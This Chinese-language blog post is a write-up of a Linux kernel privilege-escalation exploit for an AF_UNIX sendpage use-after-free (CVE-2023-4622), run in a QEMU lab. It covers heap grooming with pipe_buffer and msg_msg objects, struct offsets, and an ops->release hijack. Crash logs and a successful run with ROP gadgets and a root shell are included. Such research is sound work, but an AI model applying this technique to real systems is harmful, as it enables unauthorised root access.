poc中的利用方法 - AF_UNIX sndpage UAF
skb释放后被pipe_buf 分配到,通过pipe_buf控制skb的内容,在skb_append_pagefrags中触发UAF的实际写入。 函数中通过skb_shinfo写入一个frag
#define skb_shinfo(SKB) ((struct skb_shared_info *)(skb_end_pointer(SKB)))
static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
return skb->head + skb->end;
}
通过控制head,end的值,就可以改写任意内核地址的内容。skb->head, skb->end的偏移位置:
(gdb) p/x &(((struct sk_buff*)0)->head)
$1 = 0xc8
(gdb) p/x &(((struct sk_buff*)0)->end)
$4 = 0xc0
(gdb) p/x &(((struct skb_shared_info*)0)->nr_frags)
$5 = 0x2
(gdb) p/x &(((struct skb_shared_info*)0)->frags[0].bv_offset)
$7 = 0x3c
AF_UNIX sendpage uaf 写pipe结构,pipe结构写msg_msg结构,使两个next指向同一个msg_msg结构 -> UAF
msg_msg UAF exploit:
进一步利用,会list_del crash, as CONFIG_BUG_ON_DATA_CORRUPTION=y, set to n and test again? or is there other roads in UAF msg_msg?
0x300
found corrupted: type 194, queue 28406, victim queue 28086, victim type 195
corrupted_q: 28406
corrupted_type: 194
victim_q: 28086
victim_type: 195
victim2_q: 28092
victim2_type: 195
known_addr_rop 0xffff8881046f4000
known_addr_pipe 0xffff88800c7ce800
victim3_q: 15
victim4_q: 18
victim5_q: 12
anon_pipe_buf 0xffffffff82c2e880
fixing kernel base to 0xffffffff81000000
msgrcv hackq victim5_q
msgsnd hackq[] with fake msg
msgrcv hackq[][ 754.005329] list_del corruption, ffff888008720000->next is NULL
without victim5[ 754.052628] ------------[ cut here ]------------
_q
[ 754.071499] kernel BUG at lib/list_debug.c:49!
[ 754.086019] invalid opcode: 0000 [#1] PREEMPT SMP PTI
[ 754.095683] CPU: 1 PID: 431 Comm: poc Not tainted 6.3.0 #93
[ 754.104400] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 754.123544] RIP: 0010:__list_del_entry_valid+0x59/0xc0
[ 754.128561] Code: 48 8b 01 48 39 f8 75 5a 48 8b 72 08 48 39 f0 75 65 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 48 e5 2b 83 e8 87 bb 8b ff <0f> 0b 48 89 fe 48 c7 c7 78 e5 2b 83 e8 76 bb 8b ff 0f 0b 48 89 fe
[ 754.159796] RSP: 0018:ffffc90000b33d98 EFLAGS: 00010246
[ 754.168778] RAX: 0000000000000033 RBX: 0000000000001337 RCX: 0000000000000000
[ 754.180775] RDX: 0000000000000000 RSI: ffffffff831f90a0 RDI: 00000000ffffffff
[ 754.191226] RBP: ffffc90000b33e70 R08: 00000000ffffdfff R09: 0000000000000001
[ 754.201554] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88810b6ee400
[ 754.210648] R13: 0000000000000000 R14: ffff888008720000 R15: 0000000000001337
[ 754.219359] FS: 000000000061f3c0(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 754.228847] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 754.237818] CR2: 00000000004da400 CR3: 000000000adf8000 CR4: 0000000000050ee0
[ 754.250262] Call Trace:
[ 754.257880] <TASK>
[ 754.262829] do_msgrcv+0x4e5/0x760
[ 754.270994] ? __pfx_do_msg_fill+0x10/0x10
[ 754.277180] do_syscall_64+0x64/0x90
[ 754.284150] ? exit_to_user_mode_prepare+0x1a/0x140
[ 754.293784] ? syscall_exit_to_user_mode+0x22/0x50
[ 754.302853] ? do_syscall_64+0x70/0x90
[ 754.307906] ? syscall_exit_to_user_mode+0x22/0x50
[ 754.311440] ? do_syscall_64+0x70/0x90
[ 754.317576] ? do_syscall_64+0x70/0x90
[ 754.321945] ? syscall_exit_to_user_mode+0x22/0x50
[ 754.326590] ? do_syscall_64+0x70/0x90
[ 754.329767] ? do_syscall_64+0x70/0x90
[ 754.336447] entry_SYSCALL_64_after_hwframe+0x72/0xdc
[ 754.341288] RIP: 0033:0x42e62d
[ 754.346468] Code: f0 89 7d f8 48 89 4d e0 e8 90 91 02 00 44 8b 45 dc 4c 8b 55 e0 41 89 c1 48 8b 55 e8 48 8b 75 f0 b8 46 00 00 00 8b 7d f8 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 cf 48 89 45 f8 e8 df 91 02 00 48 8b
[ 754.394047] RSP: 002b:00007ffced7fc290 EFLAGS: 00000293 ORIG_RAX: 0000000000000046
[ 754.408102] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 000000000042e62d
[ 754.423673] RDX: 0000000000000050 RSI: 00000000004dd440 RDI: 0000000000006ef6
[ 754.435026] RBP: 00007ffced7fc2c0 R08: 0000000000000800 R09: 0000000000000000
[ 754.451520] R10: 0000000000001337 R11: 0000000000000293 R12: 00007ffced7fc5e8
[ 754.479406] R13: 00007ffced7fc5f8 R14: 00000000004c9808 R15: 0000000000000001
[ 754.494691] </TASK>
[ 754.501195] Modules linked in:
[ 754.506376] ---[ end trace 0000000000000000 ]---
[ 754.532457] RIP: 0010:__list_del_entry_valid+0x59/0xc0
[ 754.543759] Code: 48 8b 01 48 39 f8 75 5a 48 8b 72 08 48 39 f0 75 65 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 48 e5 2b 83 e8 87 bb 8b ff <0f> 0b 48 89 fe 48 c7 c7 78 e5 2b 83 e8 76 bb 8b ff 0f 0b 48 89 fe
[ 754.571529] RSP: 0018:ffffc90000b33d98 EFLAGS: 00010246
[ 754.579340] RAX: 0000000000000033 RBX: 0000000000001337 RCX: 0000000000000000
[ 754.592546] RDX: 0000000000000000 RSI: ffffffff831f90a0 RDI: 00000000ffffffff
[ 754.606379] RBP: ffffc90000b33e70 R08: 00000000ffffdfff R09: 0000000000000001
[ 754.618873] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88810b6ee400
[ 754.632027] R13: 0000000000000000 R14: ffff888008720000 R15: 0000000000001337
[ 754.645887] FS: 000000000061f3c0(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 754.664880] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 754.678003] CR2: 00000000004da400 CR3: 000000000adf8000 CR4: 0000000000050ee0
[ 754.691818] Kernel panic - not syncing: Fatal exception
pipe_buffer UAF:
pipe_buffer是一个数组, kcalloc分配时,16 * 40(pipe_buffer大小) = 560 > 512,因此在kmalloc-1024中分配:
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
覆盖ops及ops->release, pipe关闭时释放pipe_buffer数组第一个元素时即触发:
free_pipe_info
for (i = 0; i < pipe->ring_size; i++) {
struct pipe_buffer *buf = pipe->bufs + i;
if (buf->ops)
pipe_buf_release(pipe, buf);
}
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops;
buf->ops = NULL;
ops->release(pipe, buf);
}
>p/x &((struct pipe_buffer*)0)->ops
$1 = 0x10
anon_pipe_buf_ops -> anon_pipe_buf_release
static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf) // 第二个参数是buf本身,rsi
success logs:
$ ./poc
POP_RDI @ 0xffffffff8139a28d
POP_RDX @ 0xffffffff815fb154
POP_RSI @ 0xffffffff8101a6b7
POP_RSP @ 0xffffffff8101a90e
PIVOT2 @ 0xffffffff8115783e
PIVOT3 @ 0xffffffff81c80044
setup msg start..
setup msg done
setup head to 0xffff8880082e2380
0x100
0x200
found corrupted: type 196, queue 30362, victim queue 30191, victim type 197
corrupted_q: 30362
corrupted_type: 196
victim_q: 30191
victim_type: 197
victim2_q: 30215
victim2_type: 197
known_addr_rop 0xffff88800a4ab000
known_addr_pipe 0xffff88800a4c3400
victim3_q: 9
victim4_q: 12
victim5_q: 6
anon_pipe_buf 0xffffffff82c2e6c0
fixing kernel base to 0xffffffff81000000
msgrcv hackq victim5_q
msgsnd hackq[] with fake msg
msgrcv hackq[] without victim5_q
[ 527.201411] ------------[ cut here ]------------
[ 527.213001] list_del corruption, ffff888008700000->next is NULL
[ 527.225026] WARNING: CPU: 1 PID: 441 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[ 527.286586] Modules linked in:
[ 527.292214] CPU: 1 PID: 441 Comm: poc Not tainted 6.3.0-dirty #96
[ 527.313003] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 527.337204] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[ 527.346700] Code: 48 8b 01 48 39 f8 75 67 48 8b 72 08 48 39 c6 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 28 e3 2b 83 e8 07 6f 84 ff <0f> 0b 31 c0 c3 cc cc cc cc 48 89 fe 48 c7 c7 50 e3 2b 83 e8 ef 6e
[ 527.381825] RSP: 0018:ffffc90000943d98 EFLAGS: 00010282
[ 527.395278] RAX: 0000000000000000 RBX: 0000000000001337 RCX: 0000000000000000
[ 527.411171] RDX: 0000000000000003 RSI: ffffffff831f8ea8 RDI: 00000000ffffffff
[ 527.428334] RBP: ffffc90000943e70 R08: 00000000ffffdfff R09: 0000000000000001
[ 527.442482] R10: 00000000ffffdfff R11: ffffffff83c7afa0 R12: ffff88810b4b5600
[ 527.463808] R13: 0000000000000000 R14: ffff888008700000 R15: 0000000000001337
[ 527.492356] FS: 0000000001b123c0(0000) GS:ffff88813bc80000(0000) knlGS:0000000000000000
[ 527.509619] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 527.523676] CR2: 00000000004da400 CR3: 000000000a4e4000 CR4: 0000000000050ee0
[ 527.543662] Call Trace:
[ 527.552164] <TASK>
[ 527.558567] do_msgrcv+0x4e5/0x760
[ 527.581863] ? __pfx_do_msg_fill+0x10/0x10
[ 527.603898] ? do_syscall_64+0x70/0x90
[ 527.614687] do_syscall_64+0x64/0x90
[ 527.622616] ? exit_to_user_mode_prepare+0x1a/0x140
[ 527.634348] ? syscall_exit_to_user_mode+0x22/0x50
[ 527.644161] ? do_syscall_64+0x70/0x90
[ 527.654531] ? syscall_exit_to_user_mode+0x22/0x50
[ 527.665412] ? do_syscall_64+0x70/0x90
[ 527.674605] ? exit_to_user_mode_prepare+0x1a/0x140
[ 527.683838] ? syscall_exit_to_user_mode+0x22/0x50
[ 527.693838] ? do_syscall_64+0x70/0x90
[ 527.703395] entry_SYSCALL_64_after_hwframe+0x72/0xdc
[ 527.712917] RIP: 0033:0x42e5ed
[ 527.720030] Code: f0 89 7d f8 48 89 4d e0 e8 90 91 02 00 44 8b 45 dc 4c 8b 55 e0 41 89 c1 48 8b 55 e8 48 8b 75 f0 b8 46 00 00 00 8b 7d f8 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 cf 48 89 45 f8 e8 df 91 02 00 48 8b
[ 527.755587] RSP: 002b:00007fffb6cb1270 EFLAGS: 00000293 ORIG_RAX: 0000000000000046
[ 527.769792] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 000000000042e5ed
[ 527.782243] RDX: 0000000000000050 RSI: 00000000004dd440 RDI: 000000000000769a
[ 527.795741] RBP: 00007fffb6cb12a0 R08: 0000000000000800 R09: 0000000000000000
[ 527.809447] R10: 0000000000001337 R11: 0000000000000293 R12: 00007fffb6cb15c8
[ 527.821765] R13: 00007fffb6cb15d8 R14: 00000000004c9808 R15: 0000000000000001
[ 527.837768] </TASK>
[ 527.843269] ---[ end trace 0000000000000000 ]---
msgrcv msgid corrupted
try to fake pipe buffer with rop chain
wait for end
[ 589.627491] poc[414]: segfault at 0 ip 00000000004039cf sp 00007fffb6cb1360 error 6 in poc[401000+9e000] likely on CPU 1 (core 1, socket 0)
[ 589.659517] Code: 00 8b 45 f4 89 c7 e8 10 8a 02 00 eb 0a bf 01 00 00 00 e8 84 7d 02 00 b8 00 00 00 00 e8 7c fd ff ff 85 c0 74 e8 b8 00 00 00 00 <48> c7 00 00 00 00 00 90 c9 c3 f3 0f 1e fa 55 48 89 e5 48 81 ec 20
FLAG{test-by-hxqu}
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@wintermute:/# whoami
root
环境设置
- br设置 br.sh
- qemu cmd
qemu-system-x86_64 -m 4096m -kernel ./bzImage -hda ./rootfs.img -nographic -append root=/dev/sda init=/lib/systemd/systemd rw console=ttyS0 earlyprintk=vga nokaslr selinux=0 audit=0 systemd.show_status=0 kernel.printk=1 -s -S -cpu host -smp 4 -enable-kvm -net nic,model=virtio -net bridge,br=br0
- rootfs image 请参考mk-rootfs
全部复现文件 传送门
文档信息
- 本文作者:seamaner
- 本文链接:https://seamaner.github.io/2025/05/16/CVE-2023-4622/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)